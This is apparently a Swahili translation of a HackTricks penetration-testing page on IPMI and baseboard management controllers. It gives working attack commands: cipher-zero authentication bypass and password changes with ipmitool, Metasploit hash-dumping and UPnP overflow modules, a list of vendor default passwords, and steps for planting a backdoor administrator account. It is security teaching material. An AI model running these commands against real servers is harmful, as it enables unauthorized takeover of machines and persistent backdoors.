Swahili - Ht
HackTricks Training Twitter Linkedin Sponsor

623/UDP/TCP - IPMI

623/UDP/TCP - IPMI

Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (HackTricks AWS Red Team Expert)!

Njia nyingine za kusaidia HackTricks:

Taarifa Msingi

Muhtasari wa IPMI

Intelligent Platform Management Interface (IPMI) inatoa njia iliyostandardizwa ya usimamizi na ufuatiliaji wa mbali wa mifumo ya kompyuta, bila kujali mfumo wa uendeshaji au hali ya umeme. Teknolojia hii inaruhusu wasimamizi wa mfumo kusimamia mifumo kwa mbali, hata wakati zimezimwa au hazijibu, na ni muhimu hasa kwa:

  • Mipangilio ya awali ya kuanza mfumo

  • Usimamizi wa kuzima nguvu

  • Kurejesha kutoka kwa kushindwa kwa mfumo

IPMI inaweza kufuatilia joto, voltage, kasi ya kifaa cha kupoza hewa, na ugavi wa umeme, pamoja na kutoa habari ya hesabu, kukagua magogo ya vifaa, na kutuma tahadhari kupitia SNMP. Kwa uendeshaji wake, inahitajika chanzo cha umeme na uhusiano wa LAN.

Tangu kuanzishwa kwake na Intel mnamo 1998, IPMI imeungwa mkono na wauzaji wengi, ikiboresha uwezo wa usimamizi wa mbali, haswa na msaada wa toleo la 2.0 kwa serial juu ya LAN. Sehemu muhimu ni pamoja na:

  • Baseboard Management Controller (BMC): Kichapishi kikuu cha IPMI kwa shughuli.

  • Mabasi na Viunganishi vya Mawasiliano: Kwa mawasiliano ya ndani na nje, ikiwa ni pamoja na ICMB, IPMB, na viunganishi mbalimbali kwa uhusiano wa ndani na wa mtandao.

  • IPMI Memory: Kwa kuhifadhi magogo na data.

Bandari ya Default: 623/UDP/TCP (Kawaida inatumia UDP lakini inaweza pia kuendesha kwenye TCP)

Uchunguzi

Ugunduzi

nmap -n -p 623 10.0.0./24
nmap -n-sU -p 623 10.0.0./24
use  auxiliary/scanner/ipmi/ipmi_version

Unaweza kutambua toleo kwa kutumia:

use auxiliary/scanner/ipmi/ipmi_version
nmap -sU --script ipmi-version -p 623 10.10.10.10

Mipasuko ya Usalama ya IPMI

Katika uwanja wa IPMI 2.0, kasoro kubwa ya usalama iligunduliwa na Dan Farmer, ikifichua kasoro kupitia aina ya kificho 0. Kasoro hii, iliyodhibitishwa kwa undani katika utafiti wa Dan Farmer, inawezesha ufikiaji usiohalali na nenosiri lolote linalotolewa ikiwa mtumiaji halali analengwa. Udhaifu huu uligunduliwa katika BMC mbalimbali kutoka kwa watengenezaji kama vile HP, Dell, na Supermicro, ikionyesha tatizo kubwa katika utekelezaji wa IPMI 2.0.

Kupitisha Uthibitishaji wa IPMI kupitia Kificho 0

Ili kugundua kasoro hii, skana ya ziada ya Metasploit ifuatayo inaweza kutumika:

use auxiliary/scanner/ipmi/ipmi_cipher_zero

Udanganyifu wa kasoro hii unaweza kufanikishwa kwa kutumia ipmitool, kama inavyoonyeshwa hapa chini, kuruhusu orodha na marekebisho ya nywila za mtumiaji:

apt-get install ipmitool # Installation command
ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user list # Lists users
ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user set password 2 abc123 # Changes password

IPMI 2.0 RAKP Uthibitisho wa Mbali wa Kupata Hash ya Nenosiri la Mbali

Udhaifu huu unawezesha kupata nywila zilizohifadhiwa kwa chumvi (MD5 na SHA1) kwa jina lolote la mtumiaji lililopo. Ili kujaribu udhaifu huu, Metasploit inatoa moduli:

msf > use auxiliary/scanner/ipmi/ipmi_dumphashes

Uthibitishaji wa IPMI Usio na Kitambulisho

Usanidi wa chaguo-msingi katika BMC nyingi huruhusu ufikiaji "usio na kitambulisho", ambao unajulikana kwa kutokuwepo kwa majina ya mtumiaji na nywila. Usanidi huu unaweza kutumiwa kudukua upya nywila za akaunti za watumiaji walio na majina kwa kutumia ipmitool:

ipmitool -I lanplus -H 10.0.0.97 -U '' -P '' user list
ipmitool -I lanplus -H 10.0.0.97 -U '' -P '' user set password 2 newpassword

Nenosiri za Wazi za Supermicro IPMI

Chaguo muhimu katika IPMI 2.0 inahitaji uhifadhi wa nywila za wazi ndani ya BMCs kwa madhumuni ya uwakilishi. Uhifadhi wa Supermicro wa nywila hizi katika maeneo kama vile /nv/PSBlock au /nv/PSStore unaleta wasiwasi mkubwa wa usalama:

cat /nv/PSBlock

Supermicro IPMI UPnP Vulnerability

Kujumuishwa kwa msikilizaji wa UPnP SSDP katika firmware ya IPMI ya Supermicro, haswa kwenye bandari ya UDP 1900, inaleta hatari kubwa ya usalama. Udhaifu katika Intel SDK kwa vifaa vya UPnP toleo 1.3.1, kama ilivyoelezwa na ufichuzi wa Rapid7, inaruhusu ufikiaji wa mizizi kwa BMC:

msf> use exploit/multi/upnp/libupnp_ssdp_overflow

Brute Force

HP inarandarandisha nenosiri la msingi kwa bidhaa yake ya Integrated Lights Out (iLO) wakati wa utengenezaji. Mazoea haya yanatofautiana na wazalishaji wengine, ambao kwa kawaida hutumia vitambulisho vya msingi vya tuli. Muhtasari wa majina ya mtumiaji na nywila za msingi kwa bidhaa mbalimbali ni kama ifuatavyo:

  • HP Integrated Lights Out (iLO) hutumia herufi ndefu ya wahusika 8 iliyorandarandishwa kiwandani kama nywila yake ya msingi, ikionyesha kiwango cha juu cha usalama.

  • Bidhaa kama Dell's iDRAC, IBM's IMM, na Fujitsu's Integrated Remote Management Controller hutumia nywila rahisi za kudhani kama "calvin", "PASSW0RD" (na sifuri), na "admin" mtawalia.

  • Vivyo hivyo, Supermicro IPMI (2.0), Oracle/Sun ILOM, na ASUS iKVM BMC pia hutumia vitambulisho vya msingi rahisi, na "ADMIN", "changeme", na "admin" kama nywila zao.

Kupata Mwenyeji kupitia BMC

Upatikanaji wa kiutawala kwa Baseboard Management Controller (BMC) hufungua njia mbalimbali za kupata mfumo wa uendeshaji wa mwenyeji. Njia rahisi ni kuchexploitisha utendaji wa Keyboard, Video, Mouse (KVM) wa BMC. Hii inaweza kufanywa kwa kuzima upya mwenyeji hadi kwenye kabati la mizizi kupitia GRUB (kwa kutumia init=/bin/sh) au kwa kuanza kutoka kwenye CD-ROM ya kisasa iliyowekwa kama diski ya uokoaji. Njia kama hizo zinaruhusu kuingiza mlango nyuma, kuchota data, au kufanya hatua zozote zinazohitajika kwa tathmini ya usalama. Hata hivyo, hii inahitaji kuzima upya mwenyeji, ambayo ni kikwazo kikubwa. Bila kuzima upya, kupata mwenyeji unaoendelea ni ngumu zaidi na inatofautiana na usanidi wa mwenyeji. Ikiwa konsoli ya kimwili au ya serial ya mwenyeji inabaki imeingia, inaweza kuchukuliwa kwa urahisi kupitia KVM ya BMC au utendaji wa serial-over-LAN (sol) kupitia ipmitool. Uchunguzi wa utumiaji wa rasilimali za vifaa zilizoshirikiwa, kama vile basi la i2c na chip ya Super I/O, ni eneo ambalo linahitaji uchunguzi zaidi.

Kuweka Mlango Nyuma kwenye BMC kutoka kwa Mwenyeji

Baada ya kudukua mwenyeji ulio na BMC, kiolesura cha BMC cha ndani kinaweza kutumika kuweka mlango nyuma, kuunda uwepo wa kudumu kwenye seva. Shambulio hili linahitaji uwepo wa ipmitool kwenye mwenyeji uliodukuliwa na kuwezeshwa kwa msaada wa dereva wa BMC. Amri zifuatazo zinaonyesha jinsi akaunti mpya ya mtumiaji inavyoweza kuingizwa kwenye BMC kwa kutumia kiolesura cha ndani cha mwenyeji, ambacho kinapuuza haja ya uwakilishi. Mbinu hii inatumika kwa anuwai ya mifumo ya uendeshaji ikiwa ni pamoja na Linux, Windows, BSD, na hata DOS.

ipmitool user list
ID  Name        Callin  Link Auth    IPMI Msg  Channel Priv Limit
2  ADMIN            true    false      false      Unknown (0x00)
3  root            true    false      false      Unknown (0x00)

ipmitool user set name 4 backdoor
ipmitool user set password 4 backdoor
ipmitool user priv 4 4
ipmitool user list
ID  Name        Callin  Link Auth    IPMI Msg  Channel Priv Limit
2  ADMIN            true    false      false      Unknown (0x00)
3  root            true    false      false      Unknown (0x00)
4  backdoor        true    false      true      ADMINISTRATOR

Shodan

  • port:623

Marejeo

Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

Previous554,8554 - Pentesting RTSPNext631 - Internet Printing Protocol(IPP)

Last updated